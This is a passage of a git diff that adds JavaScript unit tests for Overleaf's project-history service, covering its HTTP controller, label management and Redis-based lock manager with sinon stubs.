projectId: this.historyId }, + }) + }) + + it('should call the callback with the new overleaf id', function () { + expect(this.callback).to.have.been.calledWith(null, this.historyId) + }) + }) + }) + + describe('deleteProject', function () { + beforeEach(function (done) { + this.request.yields(null, { statusCode: 204 }, '') + this.HistoryStoreManager.deleteProject(this.historyId, done) + }) + + it('should ask the history store to delete the project', function () { + expect(this.request).to.have.been.calledWithMatch({ + method: 'DELETE', + url: `${this.settings.overleaf.history.host}/projects/${this.historyId}`, + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/HttpController/HttpControllerTests.js b/services/project-history/test/unit/js/HttpController/HttpControllerTests.js new file mode 100644 index 0000000..1b7adf0 --- /dev/null +++ b/services/project-history/test/unit/js/HttpController/HttpControllerTests.js @@ -0,0 +1,573 @@ +import sinon from 'sinon' +import { strict as esmock } from 'esmock' +import mongodb from 'mongodb-legacy' +const { ObjectId } = mongodb + +const MODULE_PATH = '../../../../app/js/HttpController.js' + +describe('HttpController', function () { + beforeEach(async function () { + this.UpdatesProcessor = { + processUpdatesForProject: sinon.stub().yields(), + } + this.SummarizedUpdatesManager = { + getSummarizedProjectUpdates: sinon.stub(), + } + this.DiffManager = { + getDiff: sinon.stub(), + } + this.HistoryStoreManager = { + deleteProject: sinon.stub().yields(), + getMostRecentVersion: sinon.stub(), + getProjectBlobStream: sinon.stub(), + initializeProject: sinon.stub(), + } + 
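+ // Note: every collaborator here is a sinon stub; the esmock call further
+ // down this beforeEach swaps them in for the real modules, so each test
+ // can assert directly on these stubs.
+ 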
this.SnapshotManager = { + getFileSnapshotStream: sinon.stub(), + getProjectSnapshot: sinon.stub(), + } + this.HealthChecker = {} + this.SyncManager = { + clearResyncState: sinon.stub().yields(), + startResync: sinon.stub().yields(), + } + this.WebApiManager = { + getHistoryId: sinon.stub(), + } + this.RedisManager = { + destroyDocUpdatesQueue: sinon.stub().yields(), + clearFirstOpTimestamp: sinon.stub().yields(), + clearCachedHistoryId: sinon.stub().yields(), + } + this.ErrorRecorder = { + clearError: sinon.stub().yields(), + } + this.LabelsManager = { + createLabel: sinon.stub(), + deleteLabel: sinon.stub().yields(), + deleteLabelForUser: sinon.stub().yields(), + getLabels: sinon.stub(), + } + this.HistoryApiManager = { + shouldUseProjectHistory: sinon.stub(), + } + this.RetryManager = {} + this.FlushManager = {} + this.request = {} + this.pipeline = sinon.stub() + this.HttpController = await esmock(MODULE_PATH, { + request: this.request, + stream: { pipeline: this.pipeline }, + '../../../../app/js/UpdatesProcessor.js': this.UpdatesProcessor, + '../../../../app/js/SummarizedUpdatesManager.js': + this.SummarizedUpdatesManager, + '../../../../app/js/DiffManager.js': this.DiffManager, + '../../../../app/js/HistoryStoreManager.js': this.HistoryStoreManager, + '../../../../app/js/SnapshotManager.js': this.SnapshotManager, + '../../../../app/js/HealthChecker.js': this.HealthChecker, + '../../../../app/js/SyncManager.js': this.SyncManager, + '../../../../app/js/WebApiManager.js': this.WebApiManager, + '../../../../app/js/RedisManager.js': this.RedisManager, + '../../../../app/js/ErrorRecorder.js': this.ErrorRecorder, + '../../../../app/js/LabelsManager.js': this.LabelsManager, + '../../../../app/js/HistoryApiManager.js': this.HistoryApiManager, + '../../../../app/js/RetryManager.js': this.RetryManager, + '../../../../app/js/FlushManager.js': this.FlushManager, + }) + this.pathname = 'doc-id-123' + this.projectId = new ObjectId().toString() + this.projectOwnerId = new ObjectId().toString() + this.next = sinon.stub() + this.userId = new ObjectId().toString() + this.now = Date.now() + this.res = { + json: sinon.stub(), + send: sinon.stub(), + sendStatus: sinon.stub(), + setHeader: sinon.stub(), + } + }) + + describe('getProjectBlob', function () { + beforeEach(function () { + this.blobHash = 'abcd' + this.stream = {} + this.historyId = 1337 + this.HistoryStoreManager.getProjectBlobStream.yields(null, this.stream) + this.HttpController.getProjectBlob( + { params: { history_id: this.historyId, hash: this.blobHash } }, + this.res, + this.next + ) + }) + + it('should get a blob stream', function () { + this.HistoryStoreManager.getProjectBlobStream + .calledWith(this.historyId, this.blobHash) + .should.equal(true) + this.pipeline.should.have.been.calledWith(this.stream, this.res) + }) + + it('should set caching header', function () { + this.res.setHeader.should.have.been.calledWith( + 'Cache-Control', + 'private, max-age=86400' + ) + }) + }) + + describe('initializeProject', function () { + beforeEach(function () { + this.historyId = new ObjectId().toString() + this.req = { body: { historyId: this.historyId } } + this.HistoryStoreManager.initializeProject.yields(null, this.historyId) + this.HttpController.initializeProject(this.req, this.res, this.next) + }) + + it('should initialize the project', function () { + this.HistoryStoreManager.initializeProject.calledWith().should.equal(true) + }) + + it('should return the new overleaf id', function () { + this.res.json + .calledWith({ project: { id: 
this.historyId } }) + .should.equal(true) + }) + }) + + describe('flushProject', function () { + beforeEach(function () { + this.req = { + params: { + project_id: this.projectId, + }, + query: {}, + } + this.HttpController.flushProject(this.req, this.res, this.next) + }) + + it('should process the updates', function () { + this.UpdatesProcessor.processUpdatesForProject + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should return a success code', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + }) + + describe('getDiff', function () { + beforeEach(function () { + this.from = 42 + this.to = 45 + this.req = { + params: { + project_id: this.projectId, + }, + query: { + pathname: this.pathname, + from: this.from, + to: this.to, + }, + } + this.diff = [{ u: 'mock-diff' }] + this.DiffManager.getDiff.yields(null, this.diff) + this.HttpController.getDiff(this.req, this.res, this.next) + }) + + it('should get the diff', function () { + this.DiffManager.getDiff.should.have.been.calledWith( + this.projectId, + this.pathname, + this.from, + this.to + ) + }) + + it('should return the diff', function () { + this.res.json.calledWith({ diff: this.diff }).should.equal(true) + }) + }) + + describe('getUpdates', function () { + beforeEach(function () { + this.before = Date.now() + this.nextBeforeTimestamp = this.before - 100 + this.min_count = 10 + this.req = { + params: { + project_id: this.projectId, + }, + query: { + before: this.before, + min_count: this.min_count, + }, + } + this.updates = [{ i: 'mock-summarized-updates', p: 10 }] + this.SummarizedUpdatesManager.getSummarizedProjectUpdates.yields( + null, + this.updates, + this.nextBeforeTimestamp + ) + this.HttpController.getUpdates(this.req, this.res, this.next) + }) + + it('should get the updates', function () { + this.SummarizedUpdatesManager.getSummarizedProjectUpdates.should.have.been.calledWith( + this.projectId, + { + before: this.before, + min_count: this.min_count, + } + ) + }) + + it('should return the formatted updates', function () { + this.res.json.should.have.been.calledWith({ + updates: this.updates, + nextBeforeTimestamp: this.nextBeforeTimestamp, + }) + }) + }) + + describe('latestVersion', function () { + beforeEach(function () { + this.historyId = 1234 + this.req = { + params: { + project_id: this.projectId, + }, + } + + this.version = 99 + this.lastChange = { + v2Authors: ['1234'], + timestamp: '2016-08-16T10:44:40.227Z', + } + this.versionInfo = { + version: this.version, + v2Authors: ['1234'], + timestamp: '2016-08-16T10:44:40.227Z', + } + this.WebApiManager.getHistoryId.yields(null, this.historyId) + this.HistoryStoreManager.getMostRecentVersion.yields( + null, + this.version, + {}, + this.lastChange + ) + this.HttpController.latestVersion(this.req, this.res, this.next) + }) + + it('should process the updates', function () { + this.UpdatesProcessor.processUpdatesForProject + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should get the ol project id', function () { + this.WebApiManager.getHistoryId + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should get the latest version', function () { + this.HistoryStoreManager.getMostRecentVersion + .calledWith(this.projectId, this.historyId) + .should.equal(true) + }) + + it('should return version number', function () { + this.res.json.calledWith(this.versionInfo).should.equal(true) + }) + }) + + describe('resyncProject', function () { + beforeEach(function () { + this.req = { + params: { + project_id: 
this.projectId, + }, + query: {}, + body: {}, + } + this.HttpController.resyncProject(this.req, this.res, this.next) + }) + + it('should resync the project', function () { + this.SyncManager.startResync.calledWith(this.projectId).should.equal(true) + }) + + it('should flush the queue', function () { + this.UpdatesProcessor.processUpdatesForProject + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should return 204', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + }) + + describe('getFileSnapshot', function () { + beforeEach(function () { + this.version = 42 + this.pathname = 'foo.tex' + this.req = { + params: { + project_id: this.projectId, + version: this.version, + pathname: this.pathname, + }, + } + this.res = { mock: 'res' } + this.stream = {} + this.SnapshotManager.getFileSnapshotStream.yields(null, this.stream) + this.HttpController.getFileSnapshot(this.req, this.res, this.next) + }) + + it('should get the snapshot', function () { + this.SnapshotManager.getFileSnapshotStream.should.have.been.calledWith( + this.projectId, + this.version, + this.pathname + ) + }) + + it('should pipe the returned stream into the response', function () { + this.pipeline.should.have.been.calledWith(this.stream, this.res) + }) + }) + + describe('getProjectSnapshot', function () { + beforeEach(function () { + this.version = 42 + this.req = { + params: { + project_id: this.projectId, + version: this.version, + }, + } + this.res = { json: sinon.stub() } + this.snapshotData = { one: 1 } + this.SnapshotManager.getProjectSnapshot.yields(null, this.snapshotData) + this.HttpController.getProjectSnapshot(this.req, this.res, this.next) + }) + + it('should get the snapshot', function () { + this.SnapshotManager.getProjectSnapshot.should.have.been.calledWith( + this.projectId, + this.version + ) + }) + + it('should send json response', function () { + this.res.json.calledWith(this.snapshotData).should.equal(true) + }) + }) + + describe('getLabels', function () { + beforeEach(function () { + this.req = { + params: { + project_id: this.projectId, + }, + } + this.labels = ['label-1', 'label-2'] + this.LabelsManager.getLabels.yields(null, this.labels) + }) + + describe('project history is enabled', function () { + beforeEach(function () { + this.HistoryApiManager.shouldUseProjectHistory.yields(null, true) + this.HttpController.getLabels(this.req, this.res, this.next) + }) + + it('should get the labels for a project', function () { + this.LabelsManager.getLabels + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should return the labels', function () { + this.res.json.calledWith(this.labels).should.equal(true) + }) + }) + + describe('project history is not enabled', function () { + beforeEach(function () { + this.HistoryApiManager.shouldUseProjectHistory.yields(null, false) + this.HttpController.getLabels(this.req, this.res, this.next) + }) + + it('should return 409', function () { + this.res.sendStatus.calledWith(409).should.equal(true) + }) + }) + }) + + describe('createLabel', function () { + beforeEach(function () { + this.req = { + params: { + project_id: this.projectId, + }, + body: { + version: (this.version = 'label-1'), + comment: (this.comment = 'a comment'), + created_at: (this.created_at = Date.now().toString()), + validate_exists: true, + user_id: this.userId, + }, + } + this.label = { _id: new ObjectId() } + this.LabelsManager.createLabel.yields(null, this.label) + }) + + describe('project history is enabled', function () { + beforeEach(function () { 
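+ // shouldUseProjectHistory gates the label routes: yielding true lets the
+ // request through instead of the 409 tested further down.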
+ this.HistoryApiManager.shouldUseProjectHistory.yields(null, true) + this.HttpController.createLabel(this.req, this.res, this.next) + }) + + it('should create a label for a project', function () { + this.LabelsManager.createLabel.should.have.been.calledWith( + this.projectId, + this.userId, + this.version, + this.comment, + this.created_at, + true + ) + }) + + it('should return the label', function () { + this.res.json.calledWith(this.label).should.equal(true) + }) + }) + + describe('validate_exists = false is passed', function () { + beforeEach(function () { + this.req.body.validate_exists = false + this.HistoryApiManager.shouldUseProjectHistory.yields(null, true) + this.HttpController.createLabel(this.req, this.res, this.next) + }) + + it('should create a label for a project', function () { + this.LabelsManager.createLabel + .calledWith( + this.projectId, + this.userId, + this.version, + this.comment, + this.created_at, + false + ) + .should.equal(true) + }) + + it('should return the label', function () { + this.res.json.calledWith(this.label).should.equal(true) + }) + }) + + describe('project history is not enabled', function () { + beforeEach(function () { + this.HistoryApiManager.shouldUseProjectHistory.yields(null, false) + this.HttpController.createLabel(this.req, this.res, this.next) + }) + + it('should return 409', function () { + this.res.sendStatus.calledWith(409).should.equal(true) + }) + }) + }) + + describe('deleteLabelForUser', function () { + beforeEach(function () { + this.req = { + params: { + project_id: this.projectId, + user_id: this.userId, + label_id: (this.label_id = new ObjectId()), + }, + } + this.HttpController.deleteLabelForUser(this.req, this.res, this.next) + }) + + it('should delete a label for a project', function () { + this.LabelsManager.deleteLabelForUser + .calledWith(this.projectId, this.userId, this.label_id) + .should.equal(true) + }) + + it('should return 204', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + }) + + describe('deleteLabel', function () { + beforeEach(function () { + this.req = { + params: { + project_id: this.projectId, + label_id: (this.label_id = new ObjectId()), + }, + } + this.HttpController.deleteLabel(this.req, this.res, this.next) + }) + + it('should delete a label for a project', function () { + this.LabelsManager.deleteLabel + .calledWith(this.projectId, this.label_id) + .should.equal(true) + }) + + it('should return 204', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + }) + + describe('deleteProject', function () { + beforeEach(function () { + this.req = { + params: { + project_id: this.projectId, + }, + } + this.WebApiManager.getHistoryId + .withArgs(this.projectId) + .yields(null, this.historyId) + this.HttpController.deleteProject(this.req, this.res, this.next) + }) + + it('should delete the updates queue', function () { + this.RedisManager.destroyDocUpdatesQueue.should.have.been.calledWith( + this.projectId + ) + }) + + it('should clear the first op timestamp', function () { + this.RedisManager.clearFirstOpTimestamp.should.have.been.calledWith( + this.projectId + ) + }) + + it('should clear the cached history id', function () { + this.RedisManager.clearCachedHistoryId.should.have.been.calledWith( + this.projectId + ) + }) + + it('should clear the resync state', function () { + this.SyncManager.clearResyncState.should.have.been.calledWith( + this.projectId + ) + }) + + it('should clear any failure record', function () { + 
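+ // deleteProject should also wipe the project's entry from the failure records
+ 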
this.ErrorRecorder.clearError.should.have.been.calledWith(this.projectId) + }) + }) +}) diff --git a/services/project-history/test/unit/js/LabelsManager/LabelsManagerTests.js b/services/project-history/test/unit/js/LabelsManager/LabelsManagerTests.js new file mode 100644 index 0000000..3916f45 --- /dev/null +++ b/services/project-history/test/unit/js/LabelsManager/LabelsManagerTests.js @@ -0,0 +1,293 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import mongodb from 'mongodb-legacy' +import tk from 'timekeeper' +import { strict as esmock } from 'esmock' +const { ObjectId } = mongodb + +const MODULE_PATH = '../../../../app/js/LabelsManager.js' + +describe('LabelsManager', function () { + beforeEach(async function () { + this.now = new Date() + tk.freeze(this.now) + this.db = { + projectHistoryLabels: { + deleteOne: sinon.stub(), + find: sinon.stub(), + insertOne: sinon.stub(), + }, + } + this.mongodb = { + ObjectId, + db: this.db, + } + this.HistoryStoreManager = { + getChunkAtVersion: sinon.stub().yields(), + } + this.UpdatesProcessor = { + processUpdatesForProject: sinon.stub().yields(), + } + this.WebApiManager = { + getHistoryId: sinon.stub(), + } + this.LabelsManager = await esmock(MODULE_PATH, { + '../../../../app/js/mongodb.js': this.mongodb, + '../../../../app/js/HistoryStoreManager.js': this.HistoryStoreManager, + '../../../../app/js/UpdatesProcessor.js': this.UpdatesProcessor, + '../../../../app/js/WebApiManager.js': this.WebApiManager, + }) + + this.project_id = new ObjectId().toString() + this.historyId = 123 + this.user_id = new ObjectId().toString() + this.label_id = new ObjectId().toString() + this.callback = sinon.stub() + }) + + afterEach(function () { + tk.reset() + }) + + describe('getLabels', function () { + beforeEach(function () { + this.label = { + _id: new ObjectId(), + comment: 'some comment', + version: 123, + user_id: new ObjectId(), + created_at: new Date(), + } + + this.db.projectHistoryLabels.find.returns({ + toArray: sinon.stub().yields(null, [this.label]), + }) + }) + + describe('with valid project id', function () { + beforeEach(function () { + this.LabelsManager.getLabels(this.project_id, this.callback) + }) + + it('gets the labels state from mongo', function () { + expect(this.db.projectHistoryLabels.find).to.have.been.calledWith({ + project_id: new ObjectId(this.project_id), + }) + }) + + it('returns formatted labels', function () { + expect(this.callback).to.have.been.calledWith(null, [ + sinon.match({ + id: this.label._id, + comment: this.label.comment, + version: this.label.version, + user_id: this.label.user_id, + created_at: this.label.created_at, + }), + ]) + }) + }) + + describe('with invalid project id', function () { + it('returns an error', function (done) { + this.LabelsManager.getLabels('invalid id', error => { + expect(error).to.exist + done() + }) + }) + }) + }) + + describe('createLabel', function () { + beforeEach(function () { + this.version = 123 + this.comment = 'a comment' + this.WebApiManager.getHistoryId.yields(null, this.historyId) + }) + + describe('with createdAt', function () { + beforeEach(function () { + this.createdAt = new Date(1) + this.db.projectHistoryLabels.insertOne.yields(null, { + insertedId: new ObjectId(this.label_id), + }) + this.LabelsManager.createLabel( + this.project_id, + this.user_id, + this.version, + this.comment, + this.createdAt, + true, + this.callback + ) + }) + + it('flushes unprocessed updates', function () { + expect( + this.UpdatesProcessor.processUpdatesForProject + 
).to.have.been.calledWith(this.project_id)
+ })
+
+ it('finds the V1 project id', function () {
+ expect(this.WebApiManager.getHistoryId).to.have.been.calledWith(
+ this.project_id
+ )
+ })
+
+ it('checks there is a chunk for the project + version', function () {
+ expect(
+ this.HistoryStoreManager.getChunkAtVersion
+ ).to.have.been.calledWith(this.project_id, this.historyId, this.version)
+ })
+
+ it('creates the label in mongo', function () {
+ expect(this.db.projectHistoryLabels.insertOne).to.have.been.calledWith(
+ sinon.match({
+ project_id: new ObjectId(this.project_id),
+ comment: this.comment,
+ version: this.version,
+ user_id: new ObjectId(this.user_id),
+ created_at: this.createdAt,
+ }),
+ sinon.match.any
+ )
+ })
+
+ it('returns the label', function () {
+ expect(this.callback).to.have.been.calledWith(null, {
+ id: new ObjectId(this.label_id),
+ comment: this.comment,
+ version: this.version,
+ user_id: new ObjectId(this.user_id),
+ created_at: this.createdAt,
+ })
+ })
+ })
+
+ describe('without createdAt', function () {
+ beforeEach(function () {
+ this.db.projectHistoryLabels.insertOne.yields(null, {
+ insertedId: new ObjectId(this.label_id),
+ })
+ this.LabelsManager.createLabel(
+ this.project_id,
+ this.user_id,
+ this.version,
+ this.comment,
+ undefined,
+ true,
+ this.callback
+ )
+ })
+
+ it('creates the label with the current date', function () {
+ expect(this.db.projectHistoryLabels.insertOne).to.have.been.calledWith(
+ sinon.match({
+ project_id: new ObjectId(this.project_id),
+ comment: this.comment,
+ version: this.version,
+ user_id: new ObjectId(this.user_id),
+ created_at: this.now,
+ })
+ )
+ })
+ })
+
+ describe('with shouldValidateExists = false', function () {
+ beforeEach(function () {
+ this.createdAt = new Date(1)
+ this.db.projectHistoryLabels.insertOne.yields(null, {
+ insertedId: new ObjectId(this.label_id),
+ })
+ this.LabelsManager.createLabel(
+ this.project_id,
+ this.user_id,
+ this.version,
+ this.comment,
+ this.createdAt,
+ false,
+ this.callback
+ )
+ })
+
+ it('does not check that there is a chunk for the project + version', function () {
+ expect(this.HistoryStoreManager.getChunkAtVersion).to.not.have.been
+ .called
+ })
+ })
+
+ describe('with no userId', function () {
+ beforeEach(function () {
+ this.db.projectHistoryLabels.insertOne.yields(null, {
+ insertedId: new ObjectId(this.label_id),
+ })
+ const userId = undefined
+ this.LabelsManager.createLabel(
+ this.project_id,
+ userId,
+ this.version,
+ this.comment,
+ this.createdAt,
+ false,
+ this.callback
+ )
+ })
+
+ it('creates the label without user_id', function () {
+ expect(this.db.projectHistoryLabels.insertOne).to.have.been.calledWith(
+ sinon.match({
+ project_id: new ObjectId(this.project_id),
+ comment: this.comment,
+ version: this.version,
+ user_id: undefined,
+ created_at: this.now,
+ })
+ )
+ })
+ })
+ })
+
+ describe('deleteLabelForUser', function () {
+ beforeEach(function () {
+ this.db.projectHistoryLabels.deleteOne.yields()
+ this.LabelsManager.deleteLabelForUser(
+ this.project_id,
+ this.user_id,
+ this.label_id,
+ this.callback
+ )
+ })
+
+ it('removes the label from the database', function () {
+ expect(this.db.projectHistoryLabels.deleteOne).to.have.been.calledWith(
+ {
+ _id: new ObjectId(this.label_id),
+ project_id: new ObjectId(this.project_id),
+ user_id: new ObjectId(this.user_id),
+ },
+ this.callback
+ )
+ })
+ })
+
+ describe('deleteLabel', function () {
+ beforeEach(function () {
+ this.db.projectHistoryLabels.deleteOne.yields()
+ this.LabelsManager.deleteLabel(
+ this.project_id, + this.label_id, + this.callback + ) + }) + + it('removes the label from the database', function () { + expect(this.db.projectHistoryLabels.deleteOne).to.have.been.calledWith( + { + _id: new ObjectId(this.label_id), + project_id: new ObjectId(this.project_id), + }, + this.callback + ) + }) + }) +}) diff --git a/services/project-history/test/unit/js/LockManager/LockManagerTests.js b/services/project-history/test/unit/js/LockManager/LockManagerTests.js new file mode 100644 index 0000000..277af1b --- /dev/null +++ b/services/project-history/test/unit/js/LockManager/LockManagerTests.js @@ -0,0 +1,422 @@ +/* eslint-disable + mocha/no-nested-tests, + no-return-assign, + no-undef, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import async from 'async' +import sinon from 'sinon' +import { expect } from 'chai' +import { strict as esmock } from 'esmock' + +const MODULE_PATH = '../../../../app/js/LockManager.js' + +describe('LockManager', function () { + beforeEach(async function () { + let Timer + this.Settings = { + redis: { + lock: {}, + }, + } + this.rclient = { + auth: sinon.stub(), + del: sinon.stub().yields(), + eval: sinon.stub(), + exists: sinon.stub(), + set: sinon.stub(), + } + this.RedisWrapper = { + createClient: sinon.stub().returns(this.rclient), + } + this.Metrics = { + inc: sinon.stub(), + gauge: sinon.stub(), + Timer: (Timer = (function () { + Timer = class Timer { + static initClass() { + this.prototype.done = sinon.stub() + } + } + Timer.initClass() + return Timer + })()), + } + this.logger = { + debug: sinon.stub(), + } + this.LockManager = await esmock(MODULE_PATH, { + '@overleaf/redis-wrapper': this.RedisWrapper, + '@overleaf/settings': this.Settings, + '@overleaf/metrics': this.Metrics, + '@overleaf/logger': this.logger, + }) + + this.key = 'lock-key' + this.callback = sinon.stub() + this.clock = sinon.useFakeTimers() + }) + + afterEach(function () { + this.clock.restore() + }) + + describe('checkLock', function () { + describe('when the lock is taken', function () { + beforeEach(function () { + this.rclient.exists.yields(null, '1') + return this.LockManager.checkLock(this.key, this.callback) + }) + + it('should check the lock in redis', function () { + return this.rclient.exists.calledWith(this.key).should.equal(true) + }) + + return it('should return the callback with false', function () { + return this.callback.calledWith(null, false).should.equal(true) + }) + }) + + return describe('when the lock is free', function () { + beforeEach(function () { + this.rclient.exists.yields(null, '0') + return this.LockManager.checkLock(this.key, this.callback) + }) + + return it('should return the callback with true', function () { + return this.callback.calledWith(null, true).should.equal(true) + }) + }) + }) + + describe('tryLock', function () { + describe('when the lock is taken', function () { + beforeEach(function () { + this.rclient.set.yields(null, null) + this.LockManager._mocks.randomLock = sinon + .stub() + .returns('locked-random-value') + return this.LockManager.tryLock(this.key, this.callback) + }) + + it('should check the lock 
in redis', function () {
+ return this.rclient.set.should.have.been.calledWith(
+ this.key,
+ 'locked-random-value',
+ 'EX',
+ this.LockManager.LOCK_TTL,
+ 'NX'
+ )
+ })
+
+ return it('should return the callback with false', function () {
+ return this.callback.calledWith(null, false).should.equal(true)
+ })
+ })
+
+ return describe('when the lock is free', function () {
+ beforeEach(function () {
+ this.rclient.set.yields(null, 'OK')
+ return this.LockManager.tryLock(this.key, this.callback)
+ })
+
+ return it('should return the callback with true', function () {
+ return this.callback.calledWith(null, true).should.equal(true)
+ })
+ })
+ })
+
+ describe('deleteLock', function () {
+ beforeEach(function () {
+ return this.LockManager.deleteLock(this.key, this.callback)
+ })
+
+ it('should delete the lock in redis', function () {
+ return this.rclient.del.calledWith(this.key).should.equal(true)
+ })
+
+ return it('should call the callback', function () {
+ return this.callback.called.should.equal(true)
+ })
+ })
+
+ describe('getLock', function () {
+ describe('when the lock is not taken', function () {
+ beforeEach(function (done) {
+ this.LockManager._mocks.tryLock = sinon.stub().yields(null, true)
+ return this.LockManager.getLock(this.key, (...args) => {
+ this.callback(...Array.from(args || []))
+ return done()
+ })
+ })
+
+ it('should try to get the lock', function () {
+ return this.LockManager._mocks.tryLock
+ .calledWith(this.key)
+ .should.equal(true)
+ })
+
+ it('should only need to try once', function () {
+ return this.LockManager._mocks.tryLock.callCount.should.equal(1)
+ })
+
+ return it('should return the callback', function () {
+ return this.callback.calledWith(null).should.equal(true)
+ })
+ })
+
+ describe('when the lock is initially set', function () {
+ beforeEach(function (done) {
+ this.LockManager._mocks.tryLock = sinon.stub()
+ this.LockManager._mocks.tryLock.onCall(0).yields(null, false)
+ this.LockManager._mocks.tryLock.onCall(1).yields(null, false)
+ this.LockManager._mocks.tryLock.onCall(2).yields(null, false)
+ this.LockManager._mocks.tryLock.onCall(3).yields(null, true)
+
+ this.LockManager.getLock(this.key, (...args) => {
+ this.callback(...args)
+ return done()
+ })
+ this.clock.runAll()
+ })
+
+ it('should call tryLock multiple times until free', function () {
+ this.LockManager._mocks.tryLock.callCount.should.equal(4)
+ })
+
+ return it('should return the callback', function () {
+ return this.callback.calledWith(null).should.equal(true)
+ })
+ })
+
+ return describe('when the lock times out', function () {
+ beforeEach(function (done) {
+ this.LockManager._mocks.tryLock = sinon.stub().yields(null, false)
+ this.LockManager.getLock(this.key, (...args) => {
+ this.callback(...args)
+ return done()
+ })
+ this.clock.runAll()
+ })
+
+ return it('should return the callback with an error', function () {
+ return this.callback
+ .calledWith(sinon.match.instanceOf(Error))
+ .should.equal(true)
+ })
+ })
+ })
+
+ return describe('runWithLock', function () {
+ describe('with successful run', function () {
+ beforeEach(function () {
+ this.result = 'mock-result'
+ this.runner = sinon.stub().callsFake((extendLock, releaseLock) => {
+ return releaseLock(null, this.result)
+ })
+ this.LockManager._mocks.getLock = sinon.stub().yields()
+ this.LockManager._mocks.releaseLock = sinon.stub().yields()
+ return this.LockManager.runWithLock(
+ this.key,
+ this.runner,
+ this.callback
+ )
+ })
+
+ it('should get the 
lock', function () { + return this.LockManager._mocks.getLock + .calledWith(this.key) + .should.equal(true) + }) + + it('should run the passed function', function () { + return this.runner.called.should.equal(true) + }) + + it('should release the lock', function () { + return this.LockManager._mocks.releaseLock + .calledWith(this.key) + .should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.calledWith(null, this.result).should.equal(true) + }) + }) + + describe('when the runner function returns an error', function () { + beforeEach(function () { + this.error = new Error('oops') + this.result = 'mock-result' + this.runner = sinon.stub().callsFake((extendLock, releaseLock) => { + return releaseLock(this.error, this.result) + }) + this.LockManager._mocks.getLock = sinon.stub().yields() + this.LockManager._mocks.releaseLock = sinon.stub().yields() + return this.LockManager.runWithLock( + this.key, + this.runner, + this.callback + ) + }) + + it('should release the lock', function () { + return this.LockManager._mocks.releaseLock + .calledWith(this.key) + .should.equal(true) + }) + + return it('should call the callback with the error', function () { + return this.callback + .calledWith(this.error, this.result) + .should.equal(true) + }) + }) + + describe('extending the lock whilst running', function () { + beforeEach(function () { + this.lockValue = 'lock-value' + this.LockManager._mocks.getLock = sinon + .stub() + .yields(null, this.lockValue) + this.LockManager._mocks.extendLock = sinon.stub().callsArg(2) + this.LockManager._mocks.releaseLock = sinon.stub().callsArg(2) + }) + + it('should extend the lock if the minimum interval has been passed', function (done) { + const runner = (extendLock, releaseLock) => { + this.clock.tick(this.LockManager.MIN_LOCK_EXTENSION_INTERVAL + 1) + return extendLock(releaseLock) + } + return this.LockManager.runWithLock(this.key, runner, () => { + this.LockManager._mocks.extendLock + .calledWith(this.key, this.lockValue) + .should.equal(true) + return done() + }) + }) + + return it('should not extend the lock if the minimum interval has not been passed', function (done) { + const runner = (extendLock, releaseLock) => { + this.clock.tick(this.LockManager.MIN_LOCK_EXTENSION_INTERVAL - 1) + return extendLock(releaseLock) + } + return this.LockManager.runWithLock(this.key, runner, () => { + this.LockManager._mocks.extendLock.callCount.should.equal(0) + return done() + }) + }) + }) + + describe('exceeding the lock ttl', function () { + beforeEach(function () { + this.lockValue = 'lock-value' + this.LockManager._mocks.getLock = sinon + .stub() + .yields(null, this.lockValue) + this.LockManager._mocks.extendLock = sinon.stub().yields() + this.LockManager._mocks.releaseLock = sinon.stub().yields() + return (this.LOCK_TTL_MS = this.LockManager.LOCK_TTL * 1000) + }) + + it("doesn't log if the ttl wasn't exceeded", function (done) { + const runner = (extendLock, releaseLock) => { + this.clock.tick(this.LOCK_TTL_MS - 1) + return releaseLock() + } + return this.LockManager.runWithLock(this.key, runner, () => { + this.logger.debug.callCount.should.equal(0) + return done() + }) + }) + + it("doesn't log if the lock was extended", function (done) { + const runner = (extendLock, releaseLock) => { + this.clock.tick(this.LOCK_TTL_MS - 1) + return extendLock(() => { + this.clock.tick(2) + return releaseLock() + }) + } + return this.LockManager.runWithLock(this.key, runner, () => { + this.logger.debug.callCount.should.equal(0) + return 
done()
+ })
+ })
+
+ return it('logs that the execution exceeded the lock', function (done) {
+ const runner = (extendLock, releaseLock) => {
+ this.clock.tick(this.LOCK_TTL_MS + 1)
+ return releaseLock()
+ }
+ return this.LockManager.runWithLock(this.key, runner, () => {
+ this.logger.debug
+ .calledWithMatch('exceeded lock timeout', { key: this.key })
+ .should.equal(true)
+ return done()
+ })
+ })
+ })
+
+ return describe('releaseLock', function () {
+ describe('when the lock is current', function () {
+ beforeEach(function () {
+ this.rclient.eval.yields(null, 1)
+ return this.LockManager.releaseLock(
+ this.key,
+ this.lockValue,
+ this.callback
+ )
+ })
+
+ it('should clear the data from redis', function () {
+ return this.rclient.eval
+ .calledWith(
+ this.LockManager.UNLOCK_SCRIPT,
+ 1,
+ this.key,
+ this.lockValue
+ )
+ .should.equal(true)
+ })
+
+ return it('should call the callback', function () {
+ return this.callback.called.should.equal(true)
+ })
+ })
+
+ return describe('when the lock has expired', function () {
+ beforeEach(function () {
+ this.rclient.eval.yields(null, 0)
+ return this.LockManager.releaseLock(
+ this.key,
+ this.lockValue,
+ this.callback
+ )
+ })
+
+ return it('should return an error if the lock has expired', function () {
+ return this.callback
+ .calledWith(
+ sinon.match.has('message', 'tried to release timed out lock')
+ )
+ .should.equal(true)
+ })
+ })
+ })
+ })
+})
diff --git a/services/project-history/test/unit/js/OperationsCompressor/OperationsCompressorTests.js b/services/project-history/test/unit/js/OperationsCompressor/OperationsCompressorTests.js
new file mode 100644
index 0000000..1dc21c0
--- /dev/null
